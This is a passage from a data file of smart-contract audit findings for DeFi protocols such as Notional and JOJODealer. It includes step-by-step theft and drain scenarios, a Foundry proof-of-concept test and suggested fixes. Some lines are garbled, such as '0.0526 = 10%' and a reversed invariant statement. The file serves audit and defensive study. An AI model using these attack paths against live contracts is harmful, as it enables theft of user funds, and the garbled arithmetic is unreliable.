depositETHIntoMultipleRounds function\\n```\\nif (depositAmount == 0) {\\n revert InvalidValue();\\n }\\n```\\n,"High, since it will alter the games winner selection and it is very cheap to perform the attack.","```\\nfor (uint256 i; i < numberOfRounds; ++i) {\\n uint256 roundId = _unsafeAdd(startingRoundId, i);\\n Round storage round = rounds[roundId];\\n uint256 roundValuePerEntry = round.valuePerEntry;\\n if (roundValuePerEntry == 0) {\\n (, , roundValuePerEntry) = _writeDataToRound({roundId: roundId, roundValue: 0});\\n }\\n\\n _incrementUserDepositCount(roundId, round);\\n\\n // @review depositAmount can be ""0""\\n uint256 depositAmount = amounts[i];\\n\\n // @review 0 % ANY_NUMBER = 0\\n if (depositAmount % roundValuePerEntry != 0) {\\n revert InvalidValue();\\n }\\n uint256 entriesCount = _depositETH(round, roundId, roundValuePerEntry, depositAmount);\\n expectedValue += depositAmount;\\n\\n entriesCounts[i] = entriesCount;\\n }\\n\\n // @review will not fail as long as user deposits normally to 1 round\\n // then he can deposit to any round with ""0"" amounts\\n if (expectedValue != msg.value) {\\n revert InvalidValue();\\n }\\n```\\n" +The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND,medium,"The number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, because there is no such check in depositETHIntoMultipleRounds() function or rolloverETH() function.\\ndepositETHIntoMultipleRounds() function is called to deposit ETH into multiple rounds, so it's possible that the number of deposits in both current round and next round is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nWhen current round's number of deposits reaches MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, the round is drawn:\\n```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n\\n_drawWinner() function calls VRF provider to get a random number, when the random number is returned by VRF provider, fulfillRandomWords() function is called to chose the winner and the next round will be started:\\n```\\n _startRound({_roundsCount: roundId});\\n```\\n\\nIf the next round's deposit number is also MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND, _startRound() function may also draw the next round as well, so it seems that there is no chance the the number of deposits in a round can become larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n if (\\n !paused() &&\\n _shouldDrawWinner(numberOfParticipants, round.maximumNumberOfParticipants, round.deposits.length)\\n ) {\\n _drawWinner(round, roundId);\\n }\\n```\\n\\nHowever, _startRound() function will draw the round only if the protocol is not paused. Imagine the following scenario:\\nThe deposit number in `round 1` and `round 2` is MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND;\\n`round 1` is drawn, before random number is sent back by VRF provider, the protocol is paused by the admin for some reason;\\nRandom number is returned and fulfillRandomWords() function is called to start round 2;\\nBecause protocol is paused, `round 2` is set to OPEN but not drawn;\\nLater admin unpauses the protocol, before drawWinner() function can be called, some users may deposit more funds into `round 2` by calling depositETHIntoMultipleRounds() function or rolloverETH() function, this will make the deposit number of `round 2` larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.\\nPlease run the test code to verify:\\n```\\n function test_audit_deposit_more_than_max() public {\\n address alice = makeAddr(""Alice"");\\n address bob = makeAddr(""Bob"");\\n\\n vm.deal(alice, 2 ether);\\n vm.deal(bob, 2 ether);\\n\\n uint256[] memory amounts = new uint256[](2);\\n amounts[0] = 0.01 ether;\\n amounts[1] = 0.01 ether;\\n\\n // Users deposit to make the deposit number equals to MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND in both rounds\\n uint256 MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND = 100;\\n for (uint i; i < MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND / 2; ++i) {\\n vm.prank(alice);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.02 ether}(amounts);\\n }\\n\\n // owner pause the protocol before random word returned\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // random word returned and round 2 is started but not drawn\\n vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n uint256 randomWord = 123;\\n randomWords[0] = randomWord;\\n yolo.rawFulfillRandomWords(FULFILL_RANDOM_WORDS_REQUEST_ID, randomWords);\\n\\n // owner unpause the protocol\\n vm.prank(owner);\\n yolo.togglePaused();\\n\\n // User deposits into round 2\\n amounts = new uint256[](1);\\n amounts[0] = 0.01 ether;\\n vm.prank(bob);\\n yolo.depositETHIntoMultipleRounds{value: 0.01 ether}(amounts);\\n\\n (\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n ,\\n YoloV2.Deposit[] memory round2Deposits\\n ) = yolo.getRound(2);\\n\\n // the number of deposits in round 2 is larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND\\n assertEq(round2Deposits.length, MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND + 1);\\n }\\n```\\n","Add check in _depositETH() function which is called by both depositETHIntoMultipleRounds() function and rolloverETH() function to ensure the deposit number cannot be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND:\\n```\\n uint256 roundDepositCount = round.deposits.length;\\n\\n// Add the line below\\n if (roundDepositCount >= MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND) {\\n// Add the line below\\n revert MaximumNumberOfDepositsReached();\\n// Add the line below\\n }\\n\\n _validateOnePlayerCannotFillUpTheWholeRound(_unsafeAdd(roundDepositCount, 1), round.numberOfParticipants);\\n```\\n",This issue break the invariant that the number of deposits in a round can be larger than MAXIMUM_NUMBER_OF_DEPOSITS_PER_ROUND.,"```\\n if (\\n _shouldDrawWinner(\\n startingRound.numberOfParticipants,\\n startingRound.maximumNumberOfParticipants,\\n startingRound.deposits.length\\n )\\n ) {\\n _drawWinner(startingRound, startingRoundId);\\n }\\n```\\n" +Low precision is used when checking spot price deviation,medium,"Low precision is used when checking spot price deviation, which might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.\\nAssume the following:\\nThe max deviation is set to 1%\\n`nTokenOracleValue` is 1,000,000,000\\n`nTokenSpotValue` is 980,000,001\\n```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n\\n```\\nFile: nTokenCalculations.sol\\n int256 maxValueDeviationPercent = int256(\\n uint256(uint8(nToken.parameters[Constants.MAX_MINT_DEVIATION_LIMIT]))\\n );\\n // Check deviation limit here\\n int256 deviationInPercentage = nTokenOracleValue.sub(nTokenSpotValue).abs()\\n .mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n require(deviationInPercentage <= maxValueDeviationPercent, ""Over Deviation Limit"");\\n```\\n\\nBased on the above formula:\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(Constants.PERCENTAGE_DECIMALS).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * Constants.PERCENTAGE_DECIMALS) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 100) / 1,000,000,000\\n(19,999,999 * 100) / 1,000,000,000\\n1,999,999,900 / 1,000,000,000 = 1.9999999 = 1\\n```\\n\\nThe above shows that the oracle and spot values have deviated by 1.99999%, which is close to 2%. However, due to a rounding error, it is rounded down to 1%, and the TX will not revert.","Consider increasing the precision.\\nFor instance, increasing the precision from `Constants.PERCENTAGE_DECIMALS` (100) to 1e8 would have caught the issue mentioned earlier in the report even after the rounding down.\\n```\\nnTokenOracleValue.sub(nTokenSpotValue).abs().mul(1e8).div(nTokenOracleValue);\\n((nTokenOracleValue - nTokenSpotValue) * 1e8) / nTokenOracleValue\\n((1,000,000,000 - 980,000,001) * 1e8) / 1,000,000,000\\n(19,999,999 * 1e8) / 1,000,000,000 = 1999999.9 = 1999999\\n```\\n\\n1% of 1e8 = 1000000\\n```\\nrequire(deviationInPercentage <= maxValueDeviationPercent, ""Over Deviation Limit"")\\nrequire(1999999 <= 1000000, ""Over Deviation Limit"") => Revert\\n```\\n","The purpose of the deviation check is to ensure that the spot market value is not manipulated. If the deviation check is not accurate, it might lead to potential manipulation or create the potential for an MEV opportunity due to valuation discrepancy.",```\\nFile: Constants.sol\\n // Basis for percentages\\n int256 internal constant PERCENTAGE_DECIMALS = 100;\\n```\\n +The use of spot data when discounting is subjected to manipulation,medium,"The use of spot data when discounting is subjected to manipulation. As a result, malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.\\nWhen redeeming wfCash before maturity, the `_sellfCash` function will be executed.\\nAssume that there is insufficient fCash left on the wrapper to be sold back to the Notional AMM. In this case, the `getPrincipalFromfCashBorrow` view function will be used to calculate the number of prime cash to be withdrawn for a given fCash amount and sent to the users.\\nNote that the `getPrincipalFromfCashBorrow` view function uses the spot data (spot interest rate, spot utilization, spot totalSupply/totalDebt, etc.) internally when computing the prime cash to be withdrawn for a given fCash. Thus, it is subjected to manipulation.\\n```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, ""Redeem Failed""); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n\\nWithin the `CalculationViews.getPrincipalFromfCashBorrow` view function, it will rely on the `InterestRateCurve.calculatefCashTrade` function to compute the cash to be returned based on the current interest rate model.\\nAssume that the current utilization rate is slightly above Kink 1. When Bob redeems his wfCash, the interest rate used falls within the gentle slope between Kink 1 and Kink 2. Let the interest rate based on current utilization be 4%. The amount of fCash will be discounted back with 4% interest rate to find out the cash value (present value) and the returned value is $x$.\\nObserved that before Kink 1, the interest rate changed sharply. If one could nudge the utilization toward the left (toward zero) and cause the utilization to fall between Kink 0 and Kink 1, the interest rate would fall sharply. Since the utilization is computed as on `utilization = totalfCash/totalCashUnderlying`, one could deposit prime cash to the market to increase the denominator (totalCashUnderlying) to bring down the utilization rate.\\nBob deposits a specific amount of prime cash (either by its own funds or flash-loan) to reduce the utilization rate, which results in a reduction in interest rate. Assume that the interest rate reduces to 1.5%. The amount of fCash will be discounted with a lower interest rate of 1.5%, which will result in higher cash value, and the returned value/received cash is $y$.\\n$y > x$. So Bob received $y - x$ more cash compared to if he had not performed the manipulation. Since this is a zero-sum, Bob's gain is the protocol loss.\\n",Avoid using spot data when computing the amount of assets that the user is entitled to during redemption. Consider using a TWAP/Time-lagged oracle to guard against potential manipulation.,"Malicious users could receive more cash than expected during redemption by performing manipulation. Since this is a zero-sum, the attacker's gain is the protocol loss.","```\\nFile: wfCashLogic.sol\\n /// @dev Sells an fCash share back on the Notional AMM\\n function _sellfCash(\\n address receiver,\\n uint256 fCashToSell,\\n uint32 maxImpliedRate\\n ) private returns (uint256 tokensTransferred) {\\n (IERC20 token, bool isETH) = getToken(true); \\n uint256 balanceBefore = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n uint16 currencyId = getCurrencyId(); \\n\\n (uint256 initialCashBalance, uint256 fCashBalance) = getBalances(); \\n bool hasInsufficientfCash = fCashBalance < fCashToSell; \\n\\n uint256 primeCashToWithdraw; \\n if (hasInsufficientfCash) {\\n // If there is insufficient fCash, calculate how much prime cash would be purchased if the\\n // given fCash amount would be sold and that will be how much the wrapper will withdraw and\\n // send to the receiver. Since fCash always sells at a discount to underlying prior to maturity,\\n // the wrapper is guaranteed to have sufficient cash to send to the account.\\n (/* */, primeCashToWithdraw, /* */, /* */) = NotionalV2.getPrincipalFromfCashBorrow( \\n currencyId,\\n fCashToSell, \\n getMaturity(),\\n 0, \\n block.timestamp\\n ); \\n // If this is zero then it signifies that the trade will fail.\\n require(primeCashToWithdraw > 0, ""Redeem Failed""); \\n\\n // Re-write the fCash to sell to the entire fCash balance.\\n fCashToSell = fCashBalance;\\n }\\n```\\n" +External lending can exceed the threshold,medium,"Due to an incorrect calculation of the max lending amount, external lending can exceed the external withdrawal threshold. If this restriction/threshold is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash.\\nThe following is the extract from the Audit Scope Documentation provided by the protocol team on the contest page that describes the external withdraw threshold:\\n● External Withdraw Threshold: ensures that Notional has sufficient liquidity to withdraw from an external lending market. If Notional has 1000 units of underlying lent out on Aave, it requires 1000 * externalWithdrawThreshold units of underlying to be available on Aave for withdraw. This ensures there is sufficient buffer to process the redemption of Notional funds. If available liquidity on Aave begins to drop due to increased utilization, Notional will automatically begin to withdraw its funds from Aave to ensure that they are available for withdrawal on Notional itself.\\nTo ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nAssume that the `externalWithdrawThreshold` is 200% and the underlying is USDC. Therefore, `PERCENTAGE_DECIMALS/externalWithdrawThreshold = 100/200 = 0.5` (Line 83-84 below). This means that the number of USDC to be available on AAVE for withdrawal must be two (2) times the number of USDC Notional lent out on AAVE (A multiple of 2).\\nThe `externalUnderlyingAvailableForWithdraw` stores the number of liquidity in USDC on the AAVE pool available to be withdrawn.\\nIf `externalUnderlyingAvailableForWithdraw` is 1000 USDC and `currentExternalUnderlyingLend` is 400 USDC, this means that the remaining 600 USDC liquidity on the AAVE pool is not owned by Notional.\\nThe `maxExternalUnderlyingLend` will be `600 * 0.5 = 300`. Thus, the maximum amount that Notional can lend externally at this point is 300 USDC.\\nAssume that after Notional has lent 300 USDC externally to the AAVE pool.\\nThe `currentExternalUnderlyingLend` will become `400+300=700`, and the `externalUnderlyingAvailableForWithdraw` will become `1000+300=1300`\\nFollowing is the percentage of USDC in AAVE that belong to Notional\\n```\\n700/1300 = 0.5384615385 (53%).\\n```\\n\\nAt this point, the invariant is broken as the number of USDC to be available on AAVE for withdrawal is less than two (2) times the number of USDC lent out on AAVE after the lending.\\n```\\nFile: ExternalLending.sol\\n function getTargetExternalLendingAmount(\\n..SNIP..\\n uint256 maxExternalUnderlyingLend;\\n if (oracleData.currentExternalUnderlyingLend < oracleData.externalUnderlyingAvailableForWithdraw) {\\n maxExternalUnderlyingLend =\\n (oracleData.externalUnderlyingAvailableForWithdraw - oracleData.currentExternalUnderlyingLend)\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(rebalancingTargetData.externalWithdrawThreshold);\\n } else {\\n maxExternalUnderlyingLend = 0;\\n }\\n```\\n\\nThe root cause is that when USDC is deposited to AAVE to get aUSDC, the total USDC in the pool increases. Therefore, using the current amount of USDC in the pool to determine the maximum deposit amount is not an accurate measure of liquidity risk.","To ensure that a deposit does not exceed the threshold, the following formula should be used to determine the maximum deposit amount:\\nLet's denote:\\n$T$ as the externalWithdrawThreshold $L$ as the currentExternalUnderlyingLend $W$ as the externalUnderlyingAvailableForWithdraw $D$ as the Deposit (the variable we want to solve for)\\n$$ T = \\frac{L + D}{W + D} $$\\nSolving $D$, the formula for calculating the maximum deposit ($D$) is\\n$$ D = \\frac{TW-L}{1-T} $$\\nUsing back the same example in the ""Vulnerability Detail"" section.\\nThe maximum deposit amount is as follows:\\n```\\nD = (TW - L) / (1 - T)\\nD = (0.5 * 1000 - 400) / (1 - 0.5)\\nD = (500 - 400) / 0.5 = 200\\n```\\n\\nIf 200 USDC is lent out, it will still not exceed the threshold of 200%, which demonstrates that the formula is working as intended in keeping the multiple of two (200%) constant before and after the deposit.\\n```\\n(400 + 200) / (1000 + 200) = 0.5\\n```\\n","To ensure the redeemability of Notional's funds on external lending markets, Notional requires there to be redeemable funds on the external lending market that are a multiple of the funds that Notional has lent on that market itself.\\nIf this restriction is not adhered to, users or various core functionalities within the protocol will have issues redeeming or withdrawing their prime cash. For instance, users might not be able to withdraw their assets from the protocol due to insufficient liquidity, or liquidation cannot be carried out due to lack of liquidity, resulting in bad debt accumulating within the protocol and negatively affecting the protocol's solvency.",```\\n700/1300 = 0.5384615385 (53%).\\n```\\n +Rebalance will be delayed due to revert,medium,"The rebalancing of unhealthy currencies will be delayed due to a revert, resulting in an excess of liquidity being lent out in the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.\\nAssume that Notional supports 5 currencies ($A, B, C, D, E$), and the Gelato bot is configured to call the `checkRebalance` function every 30 minutes.\\nAssume that the current market condition is volatile. Thus, the inflow and outflow of assets to Notional, utilization rate, and available liquidity at AAVE change frequently. As a result, the target amount that should be externally lent out also changes frequently since the computation of this value relies on the spot market information.\\nAt T1, when the Gelato bot calls the `checkRebalance()` view function, it returns that currencies $A$, $B$, and $C$ are unhealthy and need to be rebalanced.\\nShortly after receiving the execution payload from the `checkRebalance()`, the bot submits the rebalancing TX to the mempool for execution at T2.\\nWhen the rebalancing TX is executed at T3, one of the currencies (Currency $A$) becomes healthy. As a result, the require check at Line 326 will revert and the entire rebalancing transaction will be cancelled. Thus, currencies $B$ and $C$ that are still unhealthy at this point will not be rebalanced.\\nIf this issue occurs frequently or repeatedly over a period of time, the rebalancing of unhealthy currencies will be delayed.\\n```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n","If one of the currencies becomes healthy when the rebalance TX is executed, consider skipping this currency and move on to execute the rebalance on the rest of the currencies that are still unhealthy.\\n```\\nfunction _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n// Remove the line below\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy);\\n// Add the line below\\n if (useCooldownCheck && !hasCooldownPassed && !isExternalLendingUnhealthy) return;\\n```\\n","The rebalancing of unhealthy currencies will be delayed, resulting in an excess of liquidity being lent out to the external market. This might affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation having issues executed due to insufficient liquidity.","```\\nFile: TreasuryAction.sol\\n function _rebalanceCurrency(uint16 currencyId, bool useCooldownCheck) private { \\n RebalancingContextStorage memory context = LibStorage.getRebalancingContext()[currencyId]; \\n // Accrues interest up to the current block before any rebalancing is executed\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId); \\n PrimeRate memory pr = PrimeRateLib.buildPrimeRateStateful(currencyId); \\n\\n bool hasCooldownPassed = _hasCooldownPassed(context); \\n (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) = \\n _isExternalLendingUnhealthy(currencyId, oracle, pr); \\n\\n // Cooldown check is bypassed when the owner updates the rebalancing targets\\n if (useCooldownCheck) require(hasCooldownPassed || isExternalLendingUnhealthy); \\n```\\n" +Rebalance might be skipped even if the external lending is unhealthy,medium,"The deviation between the target and current lending amount (offTargetPercentage) will be underestimated due to incorrect calculation. As a result, a rebalancing might be skipped even if the existing external lending is unhealthy.\\nThe formula used within the `_isExternalLendingUnhealthy` function below calculating the `offTargetPercentage` can be simplified as follows for the readability of this issue.\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{currentExternalUnderlyingLend + targetAmount} \\times 100% $$\\nAssume that the `targetAmount` is 100 and `currentExternalUnderlyingLend` is 90. The off-target percentage will be 5.26%, which is incorrect.\\n```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n\\nThe correct approach is to calculate the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$\\n```\\noffTargetPercentage = abs(90 - 100) / (100) = 10 / 100 = 0.0526 = 10%\\n```\\n\\n```\\nFile: TreasuryAction.sol\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n oracleData = oracle.getOracleData(); \\n\\n RebalancingTargetData memory rebalancingTargetData =\\n LibStorage.getRebalancingTargets()[currencyId][oracleData.holding]; \\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId); \\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId); \\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n ); \\n\\n if (oracleData.currentExternalUnderlyingLend == 0) { \\n // If this is zero then there is no outstanding lending.\\n isExternalLendingUnhealthy = false; \\n } else {\\n uint256 offTargetPercentage = oracleData.currentExternalUnderlyingLend.toInt() \\n .sub(targetAmount.toInt()).abs()\\n .toUint()\\n .mul(uint256(Constants.PERCENTAGE_DECIMALS))\\n .div(targetAmount.add(oracleData.currentExternalUnderlyingLend)); \\n \\n // prevent rebalance if change is not greater than 1%, important for health check and avoiding triggering\\n // rebalance shortly after rebalance on minimum change\\n isExternalLendingUnhealthy = \\n (targetAmount < oracleData.currentExternalUnderlyingLend) && (offTargetPercentage > 0); \\n }\\n }\\n```\\n",Consider calculating the off-target percentages as a ratio of the difference to the target:\\n$$ offTargetPercentage = \\frac{\\mid currentExternalUnderlyingLend - targetAmount \\mid}{targetAmount} \\times 100% $$,"The deviation between the target and current lending amount (offTargetPercentage) will be underestimated by approximately half the majority of the time. As a result, a rebalance intended to remediate the unhealthy external lending might be skipped since the code incorrectly assumes that it has not hit the off-target percentage. External lending beyond the target will affect the liquidity of the protocol, potentially resulting in withdrawal or liquidation, having issues executed due to insufficient liquidity.",```\\noffTargetPercentage = abs(90 - 100) / (100 + 90) = 10 / 190 = 0.0526 = 5.26%\\n```\\n +All funds can be stolen from JOJODealer,high,"`Funding._withdraw()` makes arbitrary call with user specified params. User can for example make ERC20 to himself and steal funds.\\nUser can specify parameters `param` and `to` when withdraws:\\n```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n\\nIn the end of `_withdraw()` function address `to` is called with that bytes param:\\n```\\n function _withdraw(\\n Types.State storage state,\\n address spender,\\n address from,\\n address to,\\n uint256 primaryAmount,\\n uint256 secondaryAmount,\\n bool isInternal,\\n bytes memory param\\n )\\n private\\n {\\n // rest of code\\n\\n if (param.length != 0) {\\n require(Address.isContract(to), ""target is not a contract"");\\n (bool success,) = to.call(param);\\n if (success == false) {\\n assembly {\\n let ptr := mload(0x40)\\n let size := returndatasize()\\n returndatacopy(ptr, 0, size)\\n revert(ptr, size)\\n }\\n }\\n }\\n }\\n```\\n\\nAs an attack vector attacker can execute withdrawal of 1 wei to USDC contract and pass calldata to transfer arbitrary USDC amount to himself via USDC contract.",Don't make arbitrary call with user specified params,All funds can be stolen from JOJODealer,"```\\n function executeWithdraw(address from, address to, bool isInternal, bytes memory param) external nonReentrant {\\n Funding.executeWithdraw(state, from, to, isInternal, param);\\n }\\n```\\n" +FundingRateArbitrage contract can be drained due to rounding error,high,"In the `requestWithdraw`, rounding in the wrong direction is done which can lead to contract being drained.\\nIn the `requestWithdraw` function in `FundingRateArbitrage`, we find the following lines of code:\\n```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, ""lockedEarnUSDCAmount is bigger than earnUSDCBalance""\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n\\nBecause we round down when calculating `lockedEarnUSDCAmount`, `withdrawEarnUSDCAmount` is higher than it should be, which leads to us allowing the user to withdraw more than we should allow them to given the amount of JUSD they repaid.\\nThe execution of this is a bit more complicated, let's go through an example. We will assume there's a bunch of JUSD existing in the contract and the attacker is the first to deposit.\\nSteps:\\nThe attacker deposits `1` unit of USDC and then manually sends in another 100 * 10^6 - `1` (not through deposit, just a transfer). The share price / price per earnUSDC will now be $100. Exactly one earnUSDC is in existence at the moment.\\nNext the attacker creates a new EOA and deposits a little over $101 worth of USDC (so that after fees we can get to the $100), giving one earnUSDC to the EOA. The attacker will receive around $100 worth of `JUSD` from doing this.\\nAttacker calls `requestWithdraw` with `repayJUSDAmount` = `1` with the second newly created EOA\\n`lockedEarnUSDCAmount` is rounded down to 0 (since `repayJUSDAmount` is subtracted from jusdOutside[msg.sender]\\n`withdrawEarnUSDCAmount` will be `1`\\nAfter `permitWithdrawRequests` is called, attacker will be able to withdraw the $100 they deposited through the second EOA (granted, they lost the deposit and withdrawal fees) while only having sent `1` unit of `JUSD` back. This leads to massive profit for the attacker.\\nAttacker can repeat steps 2-6 constantly until the contract is drained of JUSD.",Round up instead of down,All JUSD in the contract can be drained,"```\\njusdOutside[msg.sender] -= repayJUSDAmount;\\nuint256 index = getIndex();\\nuint256 lockedEarnUSDCAmount = jusdOutside[msg.sender].decimalDiv(index);\\nrequire(\\n earnUSDCBalance[msg.sender] >= lockedEarnUSDCAmount, ""lockedEarnUSDCAmount is bigger than earnUSDCBalance""\\n);\\nwithdrawEarnUSDCAmount = earnUSDCBalance[msg.sender] - lockedEarnUSDCAmount;\\n```\\n" +"`JUSDBankStorage::getTRate()`,`JUSDBankStorage::accrueRate()` are calculated differently, and the data calculation is biased, Causes the `JUSDBank` contract funciton result to be incorrect",medium,"```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR + 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n\\nJUSDBankStorage::getTRate(),JUSDBankStorage::accrueRate() are calculated differently, and the data calculation is biased, resulting in the JUSDBank contract not being executed correctly\\nThe wrong result causes the funciton calculation results of `JUSDBank::_isAccountSafe()`, `JUSDBank::flashLoan()`, `JUSDBank::_handleBadDebt`, etc. to be biased,and all functions that call the relevant function will be biased",Use the same calculation formula:\\n```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp // Remove the line below\\n uint256(lastUpdateTimestamp);\\n// Remove the line below\\n return tRate // Add the line below\\n (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n// Add the line below\\n return tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR // Add the line below\\n 1e18);\\n }\\n```\\n,Causes the `JUSDBank` contract funciton result to be incorrect,```\\n function accrueRate() public {\\n uint256 currentTimestamp = block.timestamp;\\n if (currentTimestamp == lastUpdateTimestamp) {\\n return;\\n }\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n tRate = tRate.decimalMul((timeDifference * borrowFeeRate) / Types.SECONDS_PER_YEAR 